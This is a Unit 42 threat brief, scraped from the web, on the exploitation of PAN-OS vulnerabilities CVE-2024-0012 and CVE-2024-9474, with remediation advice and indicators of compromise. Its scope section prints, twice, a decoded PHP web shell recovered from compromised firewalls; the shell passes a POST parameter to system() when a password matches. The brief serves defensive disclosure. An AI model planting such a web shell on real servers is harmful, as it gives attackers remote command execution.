Threat Intel Solutions

  Menu* [Tools](https://unit42.paloaltonetworks.com/tools/)* [ATOMs](https://unit42.paloaltonetworks.com/atoms/)* [Security Consulting](https://www.paloaltonetworks.com/unit42)* [About Us](https://unit42.paloaltonetworks.com/about-unit-42/)* [**Under Attack?**](https://start.paloaltonetworks.com/contact-unit42.html) * [Threat Research Center](https://unit42.paloaltonetworks.com ‘Threat Research’)* [High Profile Threats](https://unit42.paloaltonetworks.com/category/top-cyberthreats/ ‘High Profile Threats’)* [Vulnerabilities](https://unit42.paloaltonetworks.com/category/vulnerabilities/ ‘Vulnerabilities’) [Vulnerabilities](https://unit42.paloaltonetworks.com/category/vulnerabilities/)Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012 and CVE-2024-9474 (Updated Nov. 22)========================================================================================================= 5 min read Related Products Unit 42 Incident Response *  By: * [Unit 42](https://unit42.paloaltonetworks.com/author/unit42/)*  Published:November 22, 2024*  Categories: * [High Profile Threats](https://unit42.paloaltonetworks.com/category/top-cyberthreats/) * [Vulnerabilities](https://unit42.paloaltonetworks.com/category/vulnerabilities/)*  Tags: * [CVE-2024-0012](https://unit42.paloaltonetworks.com/tag/cve-2024-0012/) * [CVE-2024-9474](https://unit42.paloaltonetworks.com/tag/cve-2024-9474/) * [Operation Lunar Peek](https://unit42.paloaltonetworks.com/tag/operation-lunar-peek/) * [PAN-OS](https://unit42.paloaltonetworks.com/tag/pan-os/)* * Share* * * * * * * Executive Summary—————–Palo Alto Networks and Unit 42 continue to track exploitation activity related to CVE-2024-0012 and CVE-2024-9474. We are working with external researchers, partners and customers to share information transparently and rapidly.**Fixes for both vulnerabilities are available** . Please refer to the Palo Alto Networks Security Advisories ([CVE-2024-0012](https://security.paloaltonetworks.com/CVE-2024-0012), [CVE-2024-9474](https://security.paloaltonetworks.com/CVE-2024-9474)) for additional details about recommended solutions and affected products.An authentication bypass in Palo Alto Networks PAN-OS software ([CVE-2024-0012](https://security.paloaltonetworks.com/CVE-2024-0012)) enables an unauthenticated attacker with network access to the management interface to gain PAN-OS administrator privileges. This could allow an adversary to perform administrative actions, tamper with the configuration or exploit other authenticated privilege escalation vulnerabilities like [CVE-2024-9474](https://security.paloaltonetworks.com/CVE-2024-9474).**The risk of these issues is greatly reduced if you secure access to the management web interface by restricting access to only trusted internal IP addresses** according to our recommended [best practice deployment guidelines](https://live.paloaltonetworks.com/t5/community-blogs/tips-amp-tricks-how-to-secure-the-management-access-of-your-palo/ba-p/464431).Palo Alto Networks has actively monitored and worked with customers to identify and further minimize the very small number of PAN-OS devices with management web interfaces exposed to the internet or other untrusted networks.Palo Alto Networks originally identified threat activity potentially exploiting CVE-2024-0012 and and CVE-2024-9474 against a limited number of management web interfaces. Palo Alto Networks continues to track additional threat activity following the public release of technical insights and artifacts by third-party researchers beginning on Nov. 19, 2024. The [Current Scope of the Attack](#post-137539-_50343o6a6han) section includes more information about the observed activity. Information about observed indicators and surrounding context is available in the [Indicators of Compromise](#post-137539-_ydqdbjg0dngh) section, while a more complete list of IOCs is available at the [Unit42-Timely-Threat-Intel GitHub](https://github.com/PaloAltoNetworks/Unit42-Threat-Intelligence-Article-Information/blob/main/2024-November-IOC-updates-OperationLunarPeek.txt).We are tracking the initial exploitation of this vulnerability under the name **Operation Lunar Peek**.If you haven’t already, **Palo Alto Networks also strongly recommends that customers secure access to your management interface according to our recommended [best practice deployment guidelines](https://live.paloaltonetworks.com/t5/community-blogs/tips-amp-tricks-how-to-secure-the-management-access-of-your-palo/ba-p/464431)**. Specifically, you should restrict access to the management interface to only trusted internal IP addresses to prevent external access from the internet. The vast majority of firewalls already follow Palo Alto Networks and industry best practices.Please refer to the Palo Alto Networks Security Advisories ([CVE-2024-0012](https://security.paloaltonetworks.com/CVE-2024-0012), [CVE-2024-9474](https://security.paloaltonetworks.com/CVE-2024-9474)) for up-to-date information about affected products and versions, as well as more remediation guidance.For assistance related to a potential compromise, please reach out to [Palo Alto Networks support](https://support.paloaltonetworks.com/). Unit 42 Retainer customers can reach out to Unit 42 directly.**Vulnerabilities Discussed** [**CVE-2024-0012**](https://unit42.paloaltonetworks.com/tag/cve-2024-0012/), **[CVE-2024-9474](https://unit42.paloaltonetworks.com/tag/cve-2024-9474/)**Details of the CVE-2024-0012 and CVE-2024-9474 Vulnerabilities————————————————————–An authentication bypass in Palo Alto Networks PAN-OS software ([CVE-2024-0012](https://security.paloaltonetworks.com/CVE-2024-0012)) enables an unauthenticated attacker with network access to the management interface to gain PAN-OS administrator privileges. This could allow an adversary to perform administrative actions, tamper with the configuration or exploit other authenticated privilege escalation vulnerabilities like [CVE-2024-9474](https://security.paloaltonetworks.com/CVE-2024-9474).**The risk of these issues is greatly reduced if you secure access to the management web interface by restricting access to only trusted internal IP addresses** according to our recommended [best practice deployment guidelines](https://live.paloaltonetworks.com/t5/community-blogs/tips-amp-tricks-how-to-secure-the-management-access-of-your-palo/ba-p/464431).Please refer to the Palo Alto Networks Security Advisories ([CVE-2024-0012](https://security.paloaltonetworks.com/CVE-2024-0012), [CVE-2024-9474](https://security.paloaltonetworks.com/CVE-2024-9474)) for up-to-date information about affected products and versions, as well as more remediation guidance.Current Scope of the Attack—————————Palo Alto Networks originally identified threat activity targeting a limited number of device management web interfaces. This original activity, reported on Nov. 18, 2024, primarily originated from IP addresses known to proxy/tunnel traffic for anonymous VPN services.Unit 42 is actively clustering and characterizing this originally observed threat activity. Originally observed post-exploitation activity included interactive command execution and dropping malware, such as web shells, on the firewall.Web shell payloads recovered from compromised firewalls were obfuscated. One decoded payload sample (SHA256: 3C5F9034C86CB1952AA5BB07B4F77CE7D8BB5CC9FE5C029A32C72ADC7E814668) is presented below: -<?php $z='system'; if(${'_POST'}-['b'-]=='iUqPd') { $z(${'_POST'}-['x'-]); }; 1 2 3 4 5 -<?php $z='system'; if(${'_POST'}-['b'-]=='iUqPd') { $z(${'_POST'}-['x'-]); };The below user-agent string has been observed during multiple actor exploit attempts. User-Agent:Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv 11.0) like Gecko 1 User-Agent:Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv 11.0) like GeckoUnit 42 recommends **monitoring for and investigating any suspicious or otherwise abnormal activity on devices with a management web interface exposed to the internet**, as exact post-compromise activity and payloads may vary.Palo Alto Networks is still actively investigating and remediating all identified threat activity. Palo Alto Networks observed a notable increase in threat activity following the public release of technical insights and artifacts by third-party researchers beginning on Nov. 19, 2024. At this time, **Unit 42 assesses with high confidence that a functional exploit chaining CVE-2024-0012 and CVE-2024-9474 is publicly available, which will enable broader threat activity**.Unit 42 continues to also observe **both manual and automated scanning activity** aligning with the timeline of third-party artifacts becoming widely available. In agreement with [third-party reporting](https://arcticwolf.com/resources/blog/arctic-wolf-observes-threat-campaign-targeting-palo-alto-networks-firewall-devices/), Unit 42 has also observed increased diversity of post-compromise activity to include additional payloads such as open-source C2 tools as well as crypto miners.A list of IP addresses and surrounding context are available in [Indicators of Compromise](#post-137539-_ydqdbjg0dngh), while a more complete list of IOCs is available at the [Unit42-Timely-Threat-Intel GitHub](https://github.com/PaloAltoNetworks/Unit42-Threat-Intelligence-Article-Information/blob/main/2024-November-IOC-updates-OperationLunarPeek.txt).Unit 42 will continue to update this additional information as relevant data is available and sharable.Remediation Guidance——————–Palo Alto Networks recommends that customers update to receive the latest patches that fix CVE-2024-0012 and CVE-2024-9474. Please refer to the Palo Alto Networks Security Advisories ([CVE-2024-0012](https://security.paloaltonetworks.com/CVE-2024-0012), [CVE-2024-9474](https://security.paloaltonetworks.com/CVE-2024-9474)) for up-to-date information about affected products and versions.If you haven't already, **Palo Alto Networks also strongly recommends that customers secure access to your management interface according to our recommended best practice deployment guidelines**. Specifically, you should restrict access to the management interface to only trusted internal IP addresses to prevent external access from the internet. The vast majority of firewalls already follow Palo Alto Networks and industry best practices.Conclusion———-Palo Alto Networks has shared our findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the [Cyber Threat Alliance](https://www.cyberthreatalliance.org/).Palo Alto Networks customers are better protected by our products, as listed below. We will update this threat brief as more relevant information becomes available.Palo Alto Networks Product Protections for CVE-2024-0012 and CVE-2024-9474————————————————————————–Palo Alto Networks customers can leverage a variety of product protections and updates to identify and defend against this threat.For assistance related to a potential compromise, please reach out to [Palo Alto Networks support](https://support.paloaltonetworks.com/). Unit 42 Retainer customers can reach out to the [Unit 42 Incident Response team](https://start.paloaltonetworks.com/contact-unit42.html) or call:* North America Toll-Free: 866.486.4842 (866.4.UNIT42)* EMEA: +31.20.299.3130* APAC: +65.6983.8730* Japan: +81.50.1790.0200Indicators of Compromise————————### Command and Control InfrastructureAn increasingly high volume of threat actor IP addresses have been identified attempting to scan and/or connect to management web interfaces to exploit CVE-2024-0012 and CVE-2024-9474.Many of these IP addresses have been known to proxy/tunnel traffic for anonymous VPN services, which may include legitimate user activity originating from these IPs to other destinations.Unit 42 has also observed both manual and automated scanning originating from various IP addresses. This activity has greatly increased in volume and scope following the public release of technical insights and artifacts by third-party researchers beginning on Nov. 19, 2024.A more complete list of observed IP addresses is available at the [Unit42-Timely-Threat-Intel GitHub](https://github.com/PaloAltoNetworks/Unit42-Threat-Intelligence-Article-Information/blob/main/2024-November-IOC-updates-OperationLunarPeek.txt). Unit 42 will continue to update relevant values as additional information is available and sharable.### Post-Exploitation Artifacts**SHA256** **Context** 3C5F9034C86CB1952AA5BB07B4F77CE7D8BB5CC9FE5C029A32C72ADC7E814668 PHP web shell payload dropped on a compromised firewall
A decoded view of this payload is available in the Current Scope of the Attack sectionUser-Agent:Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv 11.0) like Gecko User-agent string observed during multiple actor exploit attemptsAdditional Resources——————–* [CVE-2024-0012 PAN-OS: Authentication Bypass in the Management Web Interface (PAN-SA-2024-0015)](https://security.paloaltonetworks.com/CVE-2024-0012) — Palo Alto Networks Security Advisories* [CVE-2024-9474 PAN-OS: Privilege Escalation (PE) Vulnerability in the Web Management Interface](https://security.paloaltonetworks.com/CVE-2024-9474) — Palo Alto Networks Security Advisories* [Tips -& Tricks: How to Secure the Management Access of Your Palo Alto Networks Device](https://live.paloaltonetworks.com/t5/community-blogs/tips-amp-tricks-how-to-secure-the-management-access-of-your-palo/ba-p/464431) — LIVEcommunity, Palo Alto Networks*Updated Nov. 19, 2024 at 3:00 P.M. PST to add clarifying language to the Executive Summary, expand the Current Scope of the Attack section, and add new IoCs.**Updated Nov. 20, 2024 at 3:25 P.M. PST to make additions to the Executive Summary, the Current Scope of the Attack section, and to add new IoCs.**Updated Nov. 21, 2024 at 3:24 P.M. PST to add user-agent string to Scope of the Attack section and Artifacts subsection in IoCs section. Additional IoCs were added to GitHub and users redirected there. Edited for consistency and clarity.**Updated Nov. 22, 2024 at 3:05 P.M. PST to add additional detail on the diversity of post-compromise activity.*Back to top ### Tags* [CVE-2024-0012](https://unit42.paloaltonetworks.com/tag/cve-2024-0012/ ‘CVE-2024-0012’)* [CVE-2024-9474](https://unit42.paloaltonetworks.com/tag/cve-2024-9474/ ‘CVE-2024-9474’)* [Operation Lunar Peek](https://unit42.paloaltonetworks.com/tag/operation-lunar-peek/ ‘Operation Lunar Peek’)* [PAN-OS](https://unit42.paloaltonetworks.com/tag/pan-os/ ‘PAN-OS’) [Threat Research Center](https://unit42.paloaltonetworks.com ‘Threat Research’) [Next: Lateral Movement on macOS: Unique and Popular Techniques and In-the-Wild Examples](https://unit42.paloaltonetworks.com/unique-popular-techniques-lateral-movement-macos/ ‘Lateral Movement on macOS: Unique and Popular Techniques and In-the-Wild Examples’) ### Table of Contents* ### Related Articles* [Palo Alto Networks Addresses Bash Vulnerability Shellshock: Mitigation for CVE-2014-6271](https://unit42.paloaltonetworks.com/addressing-bash-vulnerability-shellshock-palo-alto-networks-mitigation-cve-2014-6271/ ‘article – table of contents’) Related Vulnerabilities Resources——————————— [Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) October 23, 2024 [#### Deceptive Delight: Jailbreak LLMs Through Camouflage and Distraction](https://unit42.paloaltonetworks.com/jailbreak-llms-through-camouflage-distraction/)* [Jailbroken](https://unit42.paloaltonetworks.com/tag/jailbroken/ ‘jailbroken’)* [LLM](https://unit42.paloaltonetworks.com/tag/llm/ ‘LLM’)* [GenAI](https://unit42.paloaltonetworks.com/tag/genai/ ‘GenAI’) Read now   [Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) October 17, 2024 [#### Gatekeeper Bypass: Uncovering Weaknesses in a macOS Security Mechanism](https://unit42.paloaltonetworks.com/gatekeeper-bypass-macos/)* [Apple](https://unit42.paloaltonetworks.com/tag/apple/ ‘Apple’) Read now   [Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 12, 2024 [#### Harnessing LLMs for Automating BOLA Detection](https://unit42.paloaltonetworks.com/automated-bola-detection-and-ai/)* [API](https://unit42.paloaltonetworks.com/tag/api/ ‘API’)*

Related Tags:
CVE-2024-9474

NAICS: 54 – Professional

Scientific

Technical Services

NAICS: 81 – Other Services (except Public Administration)

NAICS: 541 – Professional

Scientific

Technical Services

NAICS: 518 – Computing Infrastructure Providers

Data Processing

Web Hosting

Related Services

NAICS: 51 – Information

NAICS: 813 – Religious

Grantmaking

Civic

Professional Services

Similar Services

CVE-2014-6271

TA0008 – Lateral Movement

Associated Indicators:
null